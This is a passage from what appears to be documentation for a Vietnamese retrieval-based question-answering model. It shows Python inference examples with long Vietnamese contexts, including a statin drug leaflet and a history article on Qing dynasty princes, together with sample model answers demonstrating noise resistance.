nhược, đau ngực, phù ngoại biên, sốt, xuất hiện bạch cầu trong nước tiểu, nhìn mờ, ù tai. Hiếm gặp: Insuact 10 hiếm khi làm giảm tiểu cầu, bệnh lý thần kinh ngoại biên, hoa mắt, ứ mật, phù thần kinh, nổi hồng ban, hội chứng hoại tử da nhiễm độc , hội chứng Stevens-Johnson , bệnh cơ, viêm cơ, tiêu cơ vân, bệnh gân, đôi khi nghiêm trọng hơn có thể đứt gân. Rất hiếm gặp: Insuact 10 rất hiếm khi gây sốc phản vệ , mất thính giác , suy gan , hội chứng to vú ở nam giới. Không rõ tần suất: Hoại tử cơ tự miễn trung gian. 4. Một số lưu ý khi dùng thuốc Insuact 10mg Không dùng thuốc Insuact với người bị quá mẫn với thành phần của thuốc, người có bệnh gan hoạt động hoặc tăng transaminase huyết thanh vô căn kéo dài, phụ nữ đang mang thai hoặc nuôi con cho bú, phụ nữ đang có ý định mang thai. Thuốc Insuact 10mg chỉ được dùng ở bệnh nhân có nguy cơ xơ vữa mạch máu cao do tăng cholesterol trong máu và phải kết hợp với chế độ ăn kiêng ít chất béo bão hòa , ít cholesterol và người bệnh đang áp dụng các biện pháp điều trị không dùng thuốc khác. Trước khi điều trị với Insuact 10 , người bệnh cần được loại trừ các nguyên nhân thứ phát gây tăng cholesterol bao gồm suy tuyến giáp , tiểu đường khó kiểm soát, hội chứng thận hư, nghiện rượu, bệnh gan tắc nghẽn, rối loạn protein trong máu, .... Ngoài ra, người bệnh cũng cần được kiểm tra, đo lường nồng độ lipid máu. Trước khi điều trị với thuốc Insuact 10mg , cần kiểm tra chức năng gan và trong quá trình dùng thuốc, người bệnh cần theo dõi, kiểm tra chức năng gan thường xuyên. Người có tiền sử mắc bệnh gan do rượu, bị nghiện rượu cần thận trọng khi dùng Insuact 10 . Trước khi dùng thuốc, người bệnh cần được cảnh báo nguy cơ gặp phải các vấn đề về cơ như căng cơ , đau cơ, yếu cơ. Thuốc Insuact 10mg có thể tương tác với các thuốc: Tăng nguy cơ tổn thương cơ (đặc biệt cơ vân) khi dùng đồng thời với thuốc điều trị viêm gan C và HIV, hạ cholesterol máu nhóm fibrat khác, thuốc ức chế miễn dịch; tăng thời gian chảy máu hoặc thời gian prothrombin khi dùng phối hợp với thuốc chống đông, indandione; tăng nhẹ nồng độ digoxin trong huyết thanh khi dùng phối hợp với Digoxin'''
question = '''Insuact 10mg được chỉ định dùng trong những trường hợp nào và liều dùng cụ thể ra sao?'''
conversation = [{"role": "system", "content": system_prompt }]
conversation.append({"role": "user", "content": template.format(context = context, question = question)})
text = tokenizer.apply_chat_template(
conversation,
tokenize=False,
add_generation_prompt=True)
model_inputs = tokenizer(text,return_tensors="pt").to(model.device)
generated_ids = model.generate(
model_inputs.input_ids,
max_new_tokens=2048,
temperature = 0.1,
#top_p=0.95,
#top_k=40,
)
generated_ids = [
output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
]
response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
print(response)
'''Trả lời:
Dựa trên ngữ cảnh cung cấp, Insuact 10mg được chỉ định dùng trong các trường hợp sau:
1. **Điều trị hỗ trợ tăng cholesterol máu nguyên phát và rối loạn lipid máu hỗn hợp**:
- **Liều dùng**: 10mg/lần/ngày.
- **Hiệu quả**: Sau 2 - 4 tuần sử dụng, bệnh nhân sẽ thấy hiệu quả của thuốc.
- **Lưu ý**: Thuốc cần được sử dụng duy trì trong thời gian dài để có hiệu quả.
2. **Điều trị hỗ trợ tăng cholesterol trong máu có tính gia đình đồng hợp tử**:
- **Liều dùng**: 10mg/lần/ngày (liều thường dùng) và tối đa 80mg/lần/ngày.
- **Lưu ý**: Liều lượng có thể được điều chỉnh tùy theo cơ địa, tiến triển bệnh và khả năng dung nạp thuốc của người bệnh.
3. **Rối loạn lipid máu nghiêm trọng ở trẻ từ 10 - 17 tuổi**:
- **Liều dùng**: 10mg/lần/ngày, sau đó có thể tăng lên 20mg/lần/ngày tùy theo tình trạng bệnh.
- **Thời gian điều chỉnh liều**: Thời gian điều chỉnh liều tối thiểu là 4 tuần.
**Lưu ý chung**:
- Thuốc được dùng theo đường uống, uống khi bụng đói hoặc no đều được, có thể uống vào bất cứ lúc nào trong ngày.
- Không dùng thuốc Insuact 10mg với người bị quá mẫn với thành phần của thuốc, người có bệnh gan hoạt động hoặc tăng transaminase huyết thanh vô căn kéo dài, phụ nữ đang mang thai hoặc nuôi con cho bú, phụ nữ đang có ý định mang thai.
- Cần kiểm tra chức năng gan trước và trong quá trình điều trị.
'''
```
#### 2. Khả năng chống nhiều
```python
# ví dụ
context = '''- Ngữ cảnh 1: . Và dù nguyên nhân thế nào, thì việc đánh người khác đều không thể chấp nhận, không ai có quyền xâm phạm thân thể của người khác, nhất là đánh những đứa trẻ là bạn của con cái mình. Lựa chọn kể với cha mẹ, người lớn về các mâu thuẫn học đường, là quyết định rất đúng của các em. Nhưng người lớn, đặc biệt những ông bố, bà mẹ cần ứng xử ra sao trước xung đột này của các con, thưa bà? Đứng ngoài mâu thuẫn bằng sự khách quan và trách nhiệm nhất có thể. Điều này giúp chúng ta đủ bình tĩnh để làm việc với tất cả các bên liên quan, từ giáo viên, bạn của con, ban giám hiệu để tìm hiểu câu chuyện và tìm kiếm cách giải quyết tích cực, trên cơ sở phối hợp nhà trường. Người lớn không thể chỉ nghe một tai và đặc biệt không nên tự xử. Phụ huynh, kể cả học sinh tự xử các vấn đề học đường là điều rất nguy hiểm và cho thấy sự coi thường pháp luật . Vụ việc ở Tuyên Quang vừa rồi là ví dụ. Các em hoàn toàn có thể phản ứng bằng cách trình bày, gửi yêu cầu, kiến nghị lên nhà trường, nhờ phụ huynh làm việc với ban giám hiệu để có biện pháp giải quyết nếu cô giáo sai, không nên đồng loạt dồn cô giáo vào tường một cách bạo lực và trái đạo đức, tôn ti trật tự như vậy. Ngoài ra, chúng ta cũng có rất nhiều cơ quan chức năng bảo vệ phụ huynh và con em, với những quyền về khiếu nại, tố cáo. Chúng ta nói nhiều về trường học an toàn. Trong những câu chuyện học sinh bị hành hung thế này, có lẽ cũng cần làm rõ vai trò, trách nhiệm của nhà trường? TPHCM và nhiều địa phương đang xây dựng môi trường trường học hạnh phúc, tiêu chí là yêu thương, an toàn, tôn trọng. Không chỉ phòng ngừa, nhà trường còn phải tích cực vào cuộc xử lý các mâu thuẫn học đường, hạn chế tối đa nguy cơ mất an toàn cho học sinh, giáo viên. Đặc biệt, giải quyết câu chuyện bạo lực học đường phải triệt để, tuyệt đối không nửa vời vì nửa vời sẽ tiềm ẩn nguy cơ rất lớn dẫn đến những vụ việc tương tự, với mức độ nghiêm trọng hơn. Vụ việc em M. ở Nha Trang tự vẫn với lá thư tuyệt mệnh bị đổ oan đầu tháng 10 vừa qua là một ví dụ về giải quyết không triệt để. Việc xây dựng trường học hạnh phúc nếu triển khai “đến nơi đến chốn”, sẽ góp phần rất lớn cải thiện tình trạng bạo lực học đường, tạo môi trường sống và học tập bình an cho các con. Từ nhiều sự vụ học sinh bạo hành lẫn nhau, giáo viên bạo hành học sinh, phụ huynh hành hung giáo viên và bạn của con. Tam giác phối hợp bảo vệ học sinh là nhà trường - gia đình - xã hội phải chăng đang có một lỗ hổng lớn, thưa bà? Câu chuyện này có liên quan đến niềm tin của phụ huynh với nhà trường. Tại sao phụ huynh lại chọn cách tự xử? Chúng ta cũng cần phải xem lại cách giải quyết vấn đề của nhà trường đã rốt ráo chưa, coi trọng lợi ích của tất cả các bên liên quan chưa hay chỉ đang xoa dịu? Người ta chỉ tìm đến nhau khi có niềm tin vào nhau. Thực trạng phụ huynh chọn cách chuyển trường cho con cũng nói lên điều này. Đây là cách chạy trốn của phụ huynh với mong muốn con được an toàn, hạnh phúc hơn ở môi trường mới. Xây dựng niềm tin cho phụ huynh, xã hội cần được chú trọng và với mỗi một trường hợp phụ huynh yêu cầu chuyển trường cho con - đang rất phổ biến - nhà trường cần xét kỹ các nguyên nhân và hóa giải. Xin bà cho biết đâu là giải pháp căn cơ cho tất cả những câu chuyện bạo lực nói trên? Để trẻ không là nạn nhân của bạo lực học đường, phụ huynh cần đồng hành và giúp con có sự hiểu biết, ý thức trước vấn đề này. Dạy con kỹ năng giao tiếp, quản lý cảm xúc rất quan trọng và điều này không thể chỉ dựa vào những khóa học kỹ năng sống, mà là từ cách cư xử của người lớn, cha mẹ, thầy cô. Không có tấm gương nào tốt hơn cho con trẻ bằng ứng xử, hành vi của người lớn. Vì vậy, không thể đòi hỏi trẻ nói không với bạo lực học đường khi trong chính từng gia đình, xã hội, người lớn vẫn đối xử với nhau bằng bạo lực.
- Ngữ cảnh 2: Tại sao triều Thanh có rất nhiều thân vương nhưng chẳng có ai dám tạo phản? Không giống như những triều đại trước đó, triều Thanh dù có sự tranh giành ngai vàng khốc liệt giữa các hoàng tử nhưng lại chẳng bao giờ xảy ra thế cục các thân vương tạo phản. Chính vì 3 lý do lớn này đã khiến cho triều đại nhà Thanh khác hẳn triều đại nhà Đường và nhà Minh. Trong thời cổ đại, các vương công quý tộc để tranh giành vương vị của mình, giữa huynh đệ ruột thịt với nhau dường như đều xảy ra đấu đá, hãm hại lẫn nhau, coi nhau như kẻ thù không đội trời chung, có ta thì không có ngươi, có ngươi thì sẽ chẳng có ta, điều này hoàn toàn không phải là điều gì xa lạ. Vậy thì tại sao ngai vàng lại có sức hút lớn đến thế? Không chỉ là đàn ông khát khao quyền lực, mà quan trọng hơn là hoàng đế có thể có được hậu cung rộng lớn, trong hậu cung còn có vô số các mỹ nữ quốc sắc thiên hương. Nhiều phi tần như vậy, đương nhiên hoàng đế cũng sẽ có rất nhiều con cái, không tính đến con gái, chỉ riêng những vị hoàng tử, để có thể có được hoàng vị, họ tranh giành nhau bằng cả sinh mạng. Vậy thì ai là người được lựa chọn để thừa kế ngai vàng, ai mới có thể gánh được trọng trách trị vì đất nước? Đa phần đều theo tục lệ truyền cho con trai đích tôn (con trai do hoàng hậu sinh ra) hoặc con trai trưởng (con trai đầu tiên của hoàng đế). Cho dù tục lệ này có lịch sử lâu đời nhưng nó cũng có những khuyết điểm rất lớn, đó chính là nếu như năng lực và chí hướng của con trai đích tôn hoặc con trai trưởng không thể gánh vác được ngai vị, nếu để anh ta lên ngôi hoàng đế, vậy thì đất nước sẽ rơi vào cục diện suy vong. Còn có một khuyết điểm nữa đó chính là những người con trai có dã tâm lớn khác sẽ không phục việc con trai đích hoặc con trai trưởng kế thừa ngôi báu, họ sẽ khởi binh tạo phản cũng là chuyện rất dễ xảy ra. Ví dụ như trong thời Đường của Trung Quốc, Đường Cao Tổ Lý Uyên đem binh tiêu diệt nhà Tùy thối nát, đồng thời lập nên nhà Đường, vốn dĩ ông cũng dựa theo tục lệ lập con trai trưởng là Lý Kiến Thành làm Thái tử nhưng con trai thứ là Lý Thế Dân lại không phục với sự sắp xếp này. Vì năng lực của ông xuất chúng, văn võ song toàn, còn lập được không ít công lao to lớn trong cuộc chiến tranh tiêu diệt nhà Tùy cùng cha mình, đương nhiên không chịu thấp hơn kẻ khác một bậc. Thế nên đã phát động binh biến Huyền Vũ Môn, trong cuộc binh biến tạo phản này, đích thân ông đã giết chết huynh trưởng của mình, đồng thời ép cha mình là Lý Uyên phải truyền ngôi cho mình. Hay như trong thời nhà Minh của Trung Quốc, trước khi Chu Nguyên Chương chọn người lập làm Thái tử, con trai trưởng Chu Tiêu đã qua đời vì bệnh nặng, thế nên Chu Nguyên Chương đã lập cháu đích tôn của mình làm Thái tử kế thừa vương vị, nhưng em trai của Chu Tiêu là Chu Đệ lại không phục lựa chọn này của Chu Nguyên Chương. Theo lý mà nói thì sau khi anh trai Chu Tiêu qua đời, ông đã có tư cách thừa kế ngai vàng nhưng Chu Nguyên Chương nhất quyết không chọn ông mà lại chọn người cách thế hệ để truyền ngôi. Điều này khiến Chu Đệ với thế lực to lớn không thể nuốt nổi cục tức này, vì thế Chu Tiêu vừa qua đời thì ông đã vội vã khởi binh tạo phản, giết chết cháu trai ruột của mình rồi tự xưng vương. Vậy thì tại sao trong triều Thanh có rất nhiều thân vương như vậy mà lại chẳng có ai đứng ra tạo phản? Đầu tiên phải nói về bối cảnh xã hội trong thời kỳ này. Triều Thanh từ khi thành lập, cũng giống với những triều đại khác, đều có rất nhiều thân vương. Nếu người dân bình thường muốn làm hoàng đế, vậy thì đó là điều hoàn toàn không thể, nhưng đối với những vương công quý tộc trong hoàng thất mà nói, họ đương nhiên sẽ có rất nhiều cơ hội, đặc biệt là những thân vương nắm đại quyền quân sự , họ chính là mối đe dọa lớn nhất đối với nhà vua. Vì thế, các đời hoàng đế đều sẽ nghĩ đủ mọi cách để áp chế, kiểm soát họ, tránh việc họ khởi binh tạo phản. Triều Thanh có lịch sử hơn 300 năm, cũng đã cho ra đời vô số thân vương, đặc biệt là cuối thời Thanh, khi Trung Quốc rơi vào cảnh khốn khó, sau khi Từ Hy Thái Hậu cầm quyền thì thế cục này càng được thể hiện rõ rệt hơn. Nhưng cho dù là một người phụ nữ cầm quyền thì cũng chẳng có một vị thân vương hoàng tộc nào đứng ra tạo phản. Có 3 nguyên nhân sau: Thứ nhất, thân vương triều Thanh không thể nối ngôi, nếu muốn tiếp tục duy trì danh phận thân vương, vậy thì bắt buộc phải có được sự đồng ý của hoàng đế và phải lập được công lao cho đất nước. Thứ hai, triều đình tiến hành giám sát nghiêm ngặt đối với các thân vương, họ không hề có cơ hội để tạo phản. Thứ ba, các thân vương không thể giao thiệp quá sâu với các đại thần, quan lại khác, điều này cũng khiến các thân vương rơi vào cảnh bị cô lập, thế nên càng không có cơ hội để cấu kết với người khác hòng tạo phản. - Video: Ngắm sự kỳ vĩ và lộng lấy của Tử Cấm Thành từ trên cao. Nguồn: Sky Eye.
- Ngữ cảnh 3: . Cùng điều chỉnh với con là điều rất quan trọng bởi vì trẻ sẽ tự tin để tự đặt những giới hạn cho chính mình khi lớn lên”, TS Nguyễn Thị Thanh đưa ra lời khuyên. “Khi con mắc sai lầm, hãy giúp chúng tìm những cách khác tốt hơn. Đơn cử dùng hậu quả để dạy cho chúng bài học, điều đó tốt hơn rất nhiều việc xử phạt. Nếu cha mẹ chỉ biết trừng phạt, sẽ nhận được lời xin lỗi nhưng không thể giúp trẻ tỉnh ngộ. Bởi chúng chỉ biết được mình đã sai mà không biết sai ở chỗ nào và làm thế nào mới là đúng”
- Ngữ cảnh 4: . “MẤT ĐI CHA MẸ Ở TUỔI ĐẸP NHẤT CỦA NGƯỜI PHỤ NỮ CÀNG KHIẾN TÔI PHẢI MẠNH MẼ” - Làm con của nghệ sĩ Thanh Hiền, Đinh Y Nhung cảm nhận sợi dây liên kết giữa hai mẹ con thế nào? Má Thanh Hiền là người rất tuyệt vời. Hai má con hồi xưa từng làm phim truyền hình với nhau rồi, cho nên khi tái hợp thì không mấy bỡ ngỡ. Khi đối diễn, hai má con rất ăn ý, như người thân ruột thịt vậy đó. - Khi thể hiện những phân cảnh cảm động trong phim, có khi nào chị thấy nhớ mẹ không? Có chứ, nhất là ở những phân đoạn gia đình sum họp, tự nhiên mình bị buồn. Ai cũng muốn có cha, có mẹ, ai cũng muốn Tết được chạy về bên gia đình. Trong mười mấy, hai chục năm qua, Nhung bị chạnh lòng. Tuy nhiên, chỉ trong tích tắc, tôi tự trấn an rằng, mình đang quay phim, đang hóa thân vào nhân vật nên không thể xao lãng được. Mình là con người mà, cũng có lúc tâm trạng vui buồn bất chợt, nhưng Nhung luôn cố gắng lấy lại phong độ liền. - Mất ba mẹ từ sớm, không có chỗ dựa tinh thần, cô gái trẻ Đinh Y Nhung năm đó có nhận những lời mời gọi khiếm nhã không? Trước đây, Nhung không có bạn bè nhiều, chủ yếu chỉ lo đi học, đi làm để lo cho cuộc sống thôi. Nên Nhung không phải đón nhận những lời mời gọi nào hết. - Mất mát từ quá khứ có ảnh hưởng gì đến suy nghĩ về tương lai của chị sau này, ví dụ khi có con thì sẽ bù đắp, chăm sóc cho con nhiều hơn? Năm ba mẹ mất thì mình vẫn còn khá trẻ, thật ra cái tuổi đó là tuổi đẹp của người phụ nữ. Sau đó, tôi đi làm, rồi yêu đương và lập gia đình. Có rất nhiều thứ hối tiếc để nói về Nhung của thời điểm đó. Thứ nhất là mình chưa thành công, thứ hai là mình chưa trả hiếu cho cha mẹ, thứ ba là mình còn bấp bênh. Nhung lúc đó lì lợm lắm, không cho phép mình ngã, bằng mọi giá phải tiến về trước dù có hàng ngàn chông gai ngăn cản. Có lúc tôi bị người này cười, người kia mỉa, nhưng mà mình vẫn cố bước đi. Người ta có cười thì cũng không mang lại cho mình được gì, tôi chỉ biết làm hết khả năng để lo cho bản thân, lo cho em của mình. Hiện, con cái Nhung đã đi nước ngoài rồi. Bé đang học đại học về âm nhạc, còn em mình cũng đã lớn rồi. Đối với Nhung ngay lúc này thì không phải thành công hay hoàn hảo lắm, nhưng ít nhất là tôi đã cố gắng để tự chịu trách nhiệm với cuộc đời mình. Mất cha, mất mẹ, đối với một người hai mươi mấy tuổi thì điều cần nhất lúc đó là có được gia đình ở bên. Nhưng mình không có chỗ dựa tinh thần thì càng phải mạnh mẽ hơn nữa. Tôi tự gặm nhấm nỗi đau mất người thân trong một thời gian dài, có khi đến cả bạn bè cũng không hề biết. Một thời gian sau, bạn bè thời và mọi người mới biết. Còn người hâm mộ, đồng nghiệp trong nghề gần như không biết chuyện ba mẹ Nhung mất sớm, chỉ có vài người chơi thân với nhau biết thôi. Sau này, dần dần tâm lý dần ổn định thì mình mới bắt đầu chia sẻ. “CON ĐI DU HỌC, TÔI DẶN BÉ CÁI GÌ KHÔNG TỐT THÌ MÌNH BỎ QUA” - Đinh Y Nhung từng tiết lộ mình rất thân với con gái. Có vẻ như quyết định để con đi du học là không hề dễ dàng? Thật sự là không có ba mẹ nào muốn con mình đi xa, nhưng việc du học lại là quyết định của bé. Con Nhung bày tỏ muốn học đại học ở nước ngoài và muốn đi sớm để thực hiện ước mơ. Nhưng lúc đó con còn nhỏ quá, phải đợi đến năm con 17 tuổi thì Nhung mới quyết định cho bạn nhỏ đi. Con cái từ nhỏ ở với bố mẹ giờ lại đi xa thì tất nhiên người làm cha làm mẹ cùng phải thấy sốc, thấy buồn. Nhưng Nhung hoàn toàn tôn trọng quyết định của con về việc chọn ngành nghề và tương lai của mình. Ba mẹ sẽ đứng sau và là người đưa cho con những lời khuyên và chỉ có thể đồng hành cùng con tới một mốc thời gian nào đó. Về sau, con phải đi làm và tự có trách nhiệm với cuộc đời của mình. - Có con gái đang ở tuổi lớn lại xa bố mẹ và tiếp xúc một nền văn hóa phương Tây cởi mở, Đinh Y Nhung đã khuyên dạy và đồng hành với con như thế nào? Ngay khi ở Việt Nam, con gái Nhung đã được theo học trường quốc tế. Hai mẹ con cũng có rất nhiều dịp để tâm sự và chia sẻ với nhau. Ngay từ nhỏ, Nhung đã cho bé được tiếp xúc song song giữa hai nền văn hóa để con không bỡ ngỡ. Mình là người Việt nên đương nhiên vẫn dạy con theo văn hóa Á Đông là chủ yếu. Nhung vẫn luôn tạo điều kiện để con cảm nhận những nét đẹp trong nền văn hóa quê hương. Văn hóa phương Tây thì xa lạ hơn nhưng Nhung cũng khuyên con rằng điều gì hay thì mình học hỏi, cái gì không tốt thì mình nên bỏ qua. Tất nhiên mình không thể theo sát con, nhất là khi bé đang ở độ tuổi mới lớn, có nhiều sự hiếu kỳ. Tuy nhiên, Nhung cũng không quá lo lắng vì qua quá trình học tập ở các trường quốc tế, bé cùng đã được làm quen dần với văn hóa phương Tây. Bé muốn làm bạn với mẹ nên có nhiều thứ bé muốn hỏi, muốn tiếp thu thì hai mẹ con lại ngồi xuống chia sẻ, tâm sự với nhau. Nhung tin, con luôn tỉnh táo để đưa ra những quyết định cho bản thân mình. Nhung không dám nói trước, nhưng hiện tại con vẫn luôn biết nói cảm ơn, xin phép trước khi làm bất cứ điều gì nên mình vẫn rất tin tưởng con. - Chị nhận xét thế nào về tính cách của con gái? Phải chăng bé là phiên bản nhí của chị? Con gái Nhung có nhiều nét giống mẹ.
- Ngữ cảnh 5: . - Trong quá trình quay phim, má Hiền có tham gia đóng góp ý kiến cho dàn diễn viên trẻ không? Không phải má Hiền muốn làm thầy nhưng có những lúc cũng lên tiếng góp ý một vài điều. Những lúc như thế các bạn diễn viên trẻ cũng nghe theo. Phải giúp đỡ nhau như vậy mới có thể tạo ra được một tác phẩm hay. Chứ có nhiều diễn viên trẻ có lòng tự trọng cao, chỉ khi đạo diễn nói mới nghe thì không bao giờ có thể tiến bộ được. Má Hiền phải cảm thấy hạnh phúc mới đúng, càng ngày xung quanh càng có nhiều bạn bè, các mối quan hệ nhờ đó mà cũng ngày càng đông. Ngày xưa, khi tham gia là Mùi Ngò Gai chưa có ai biết nhưng sau khi phim phát sóng mọi người đã nhớ đến má. Hiện tại, má Hiền đã được đạo diễn, nhà sản xuất mời đóng phim đó đã là một niềm hạnh phúc. Đi ra đường hay đi khám bệnh, người ta cứ vây xung quanh quan tâm hỏi han khiến má cảm thấy rất vui lắm (cười). Cảm ơn nghệ sĩ Thanh Hiền đã nhận lời tham gia phỏng vấn với SAOstar. Chúc má có nhiều sức khỏe để tiếp tục làm nghề!'''
question = '''Tại sao các thân vương triều Thanh không dám tạo phản mặc dù có nhiều quyền lực và cơ hội?'''
'''Trả lời:
Các thân vương triều Thanh không dám tạo phản mặc dù có nhiều quyền lực và cơ hội vì có ba lý do chính:
1. **Không thể nối ngôi**: Để duy trì danh phận thân vương, họ phải có sự đồng ý của hoàng đế và phải lập được công lao cho đất nước. Điều này hạn chế cơ hội của họ để trở thành hoàng đế.
2. **Giám sát nghiêm ngặt**: Triều đình tiến hành giám sát nghiêm ngặt đối với các thân vương, không cho họ cơ hội để tạo phản.
3. **Bị cô lập**: Các thân vương không thể giao thiệp quá sâu với các đại thần, quan lại khác, điều này khiến họ bị cô lập và không có cơ hội cấu kết với người khác để tạo phản.'''
```
#### 3. Loại bỏ negative
```python
context = '''- Ngữ cảnh 1: Thái Bình hướng đến là trung tâm công nghiệp, năng lượng của vùng Với tiềm năng sẵn có, quy hoạch tỉnh Thái Bình thời kỳ 2021-2030, tầm nhìn đến năm 2050 xác định tỉnh sẽ phát triển công nghiệp theo hướng hiện đại, bền vững dựa trên nghiên cứu phát triển điện gió, điện khí, cân bằng lượng phát thải. Sáng 5/3, UBND tỉnh Thái Bình tổ chức Hội nghị công bố quy hoạch của tỉnh thời kỳ 2021-2030, tầm nhìn đến năm 2050 và xúc tiến đầu tư tỉnh Thái Bình. Phát biểu tại hội nghị, Phó Chủ tịch Thường trực UBND tỉnh Nguyễn Quang Hưng cho biết: Mục tiêu của quy hoạch là đến năm 2030, Thái Bình trở thành địa phương thuộc nhóm phát triển khá và là một trong những trung tâm phát triển công nghiệp của vùng Đồng bằng sông Hồng, có cơ cấu kinh tế hiện đại với công nghiệp là động lực chủ yếu cho tăng trưởng để Thái Bình phát triển nhanh, toàn diện và bền vững. Đến năm 2050, Thái Bình là tỉnh phát triển của vùng Đồng bằng sông Hồng, tăng trưởng kinh tế dựa trên nền tảng khoa học công nghệ, đổi mới sáng tạo và các ngành kinh tế trụ cột có sức cạnh tranh cao. Quy hoạch tỉnh đã xác định 4 trụ cột tăng trưởng, 3 khâu đột phá, 4 không gian kinh tế - xã hội, 3 hành lang kinh tế, định hướng phát triển các ngành và lĩnh vực và 6 nhiệm vụ trọng tâm. Quy hoạch tỉnh cũng có nhiều điểm mới, đột phá như mở ra không gian phát triển mới thông qua hoạt động “lấn biển”, tạo quỹ đất cho các hoạt động chức năng, hình thành không gian công nghiệp - đô thị - dịch vụ. Về hạ tầng giao thông, Thái Bình sẽ đầu tư 3 tuyến cao tốc là cao tốc Ninh Bình - Hải Phòng (CT.08), đường vành đai 5 - Hà Nội (CT.39) và tuyến CT.16 kết nối Khu kinh tế với thành phố Thái Bình và vùng kinh tế phía Tây Bắc Thủ đô. Tỉnh cũng sẽ đầu tư 101km đường sắt, khổ đường dự kiến rộng 1.435 mm và sân bay chuyên dụng nằm ở ven biển Thái Bình. Về phát triển kinh tế, quy hoạch tỉnh Thái Bình xác định tỉnh sẽ phát triển công nghiệp theo hướng hiện đại, công nghệ tiên tiến, giá trị gia tăng cao, tham gia sâu, toàn diện vào mạng lưới sản xuất, chuỗi giá trị toàn cầu, phát huy các tiềm năng, thế mạnh để đưa Thái Bình trở thành một trong những trung tâm phát triển công nghiệp, năng lượng của vùng Đồng bằng sông Hồng. Tỉnh khuyến khích đầu tư phát triển các ngành có thế mạnh và có thể tạo đột phá như năng lượng, cơ khí chế biến, chế tạo, công nghiệp công nghệ cao, điện - điện tử, chế biến sản phẩm nông, lâm nghiệp và thủy sản… Đồng thời, tập trung nghiên cứu phát triển điện gió, điện khí để tạo nguồn điện sạch và cân bằng lượng phát thải, nghiên cứu đầu tư xây dựng nhà máy chế biến Condensate, chuẩn bị mọi điều kiện để xây dựng và đưa vào vận hành Nhà máy nhiệt điện LNG Thái Bình. Về nông nghiệp, tỉnh Thái Bình vẫn xác định đây là \"trụ cột quan trọng\" trong phát triển kinh tế của tỉnh, góp phần bảo đảm an ninh lương thực quốc gia, hướng tới trở thành trung tâm sản xuất nông nghiệp hàng đầu của Đồng bằng sông Hồng. Phát biểu tại hội nghị, Phó Thủ tướng Chính phủ Trần Lưu Quang đánh giá Thái Bình có 4 tiềm năng, lợi thế lớn để có thể có sự bứt phá trong thời gian tới như vị trí địa lý và tiếp cận đất đai thuận lợi; từng là địa phương đi đầu trong xây dựng nông thôn mới bài bản và nghiêm túc, nhận được sự quan tâm của nhiều thế hệ lãnh đạo Đảng, Nhà nước và có nhiều doanh nhân người Thái Bình và luôn hướng về quê hương; có sự đoàn kết, thống nhất, trước hết là trong tập thể lãnh đạo. Về vị trí địa lý và tiếp cận đất đai, Phó Thủ tướng cho rằng trong tương lai, khi Luật Đất đai có hiệu lực, Thái Bình sẽ có nhiều điều kiện lấn biển để triển khai các dự án khu đô thị, khu công nghiệp thân thiện với môi trường. Đối với nông nghiệp, Phó Thủ tướng nhấn mạnh về lâu dài Thái Bình có thể ghi điểm từ phát triển công nghiệp nhưng trước mắt, đặc biệt trong lúc khó khăn thì nông nghiệp vẫn là nền tảng rất quý giá. Mặt khác, ứng dụng của công nghệ cao trong sản xuất nông nghiệp sẽ rút ngắn thời gian làm đồng của người nông dân, tạo điều kiện để Thái Bình huy động nguồn nhân lực trong nông nghiệp sang phát triển các ngành công nghiệp và dịch vụ, một lợi thế mà không phải địa phương nào cũng có được như Thái Bình. Bên cạnh những lợi thế trên, lãnh đạo Chính phủ chỉ ra một số khó khăn mà tỉnh phải đối mặt như Thái Bình đã sử dụng hết 1.600 ha chỉ tiêu đất công nghiệp trong giai đoạn này, đòi hỏi phải có phương án giải quyết thấu đáo trong thời gian tới để tỉnh tiếp tục phát triển công nghiệp. Đồng thời, Thái Bình cũng phải cạnh tranh với những địa phương như Hải Phòng, Quảng Ninh trong thu hút FDI trong khi phát triển cơ sở hạ tầng chưa theo kịp mong muốn. Do vậy, khi triển khai quy hoạch tỉnh, Phó Thủ tướng nhắn nhủ tới địa phương 8 chữ: Tuân thủ, linh hoạt, đồng bộ và thấu hiểu. Đồng thời, tỉnh cũng phải \"linh hoạt\" trong tổ chức thực hiện, trong trường hợp cá biệt cụ thể, điều chỉnh mục tiêu cho phù hợp. Sáng cùng ngày, Phó Thủ tướng Trần Lưu Quang đã dự Lễ khởi công dự án Nhà máy Pegavision Việt Nam tại khu công nghiệp Liên Hà Thái, huyện Thái Thụy, tỉnh Thái Bình
- Ngữ cảnh 2: Bình Định được định hướng là trung tâm khoa học, công nghệ đổi mới sáng tạo Tỉnh Bình Định được định hướng phát triển ngành công nghiệp phát triển theo hướng hiện đại, quy mô lớn, trở thành một trong những trung tâm công nghiệp chế biến chế tạo và công nghệ cao của vùng Bắc Trung Bộ và duyên hải Trung Bộ. Theo Quy hoạch tỉnh Bình Định thời kỳ 2021 - 2030, tầm nhìn đến năm 2050 vừa được Thủ tướng Chính phủ phê duyệt, tỉnh Bình Định được định hướng phát triển ngành công nghiệp phát triển theo hướng hiện đại, quy mô lớn, trở thành một trong những trung tâm công nghiệp chế biến chế tạo và công nghệ cao của vùng Bắc Trung Bộ và duyên hải Trung Bộ. Ngành công nghiệp tăng trưởng nhanh, bền vững, hướng tới tăng trưởng xanh, kinh tế tuần hoàn là trụ cột để phát triển và chuyển dịch cơ cấu kinh tế của tỉnh. Ngành chế biến, chế tạo công nghệ cao (dịch chuyển ngành công nghiệp chế biến, chế tạo sang lĩnh vực sản xuất có giá trị gia tăng cao như: chế biến sâu nông - thủy - hải sản, linh kiện điện tử, bán dẫn, dược phẩm), công nghệ thông tin, trí tuệ nhân tạo trở thành một trong những lĩnh vực đột phá, góp phần đưa tỉnh Bình Định trở thành một trung tâm khoa học, công nghệ đổi mới sáng tạo của vùng và cả nước. Quy hoạch tỉnh Bình Định thời kỳ 2021 - 2030, tầm nhìn đến năm 2050 đặt ra yêu cầu tỉnh này phải chú trọng thu hút đầu tư phát triển năng lượng tái tạo, năng lượng sạch như điện gió ven bờ, điện gió ngoài khơi, điện mặt trời, điện sinh khối và nguồn năng lượng mới (hydrogen/amoniac xanh…); các dự án sản xuất thép quy mô lớn, đóng tàu, sản xuất thiết bị phụ trợ điện gió có công nghệ tiên tiến để nâng cấp xây dựng hạ tầng kỹ thuật sản xuất, thúc đẩy chuyển dịch kinh tế. Quy hoạch tỉnh Bình Định thời kỳ 2021 - 2030, tầm nhìn đến năm 2050 cũng đặt ra mục tiêu đến năm 2030, Bình Định trở thành tỉnh phát triển thuộc nhóm dẫn đầu vùng Bắc Trung Bộ và duyên hải Trung Bộ, là trung tâm công nghiệp 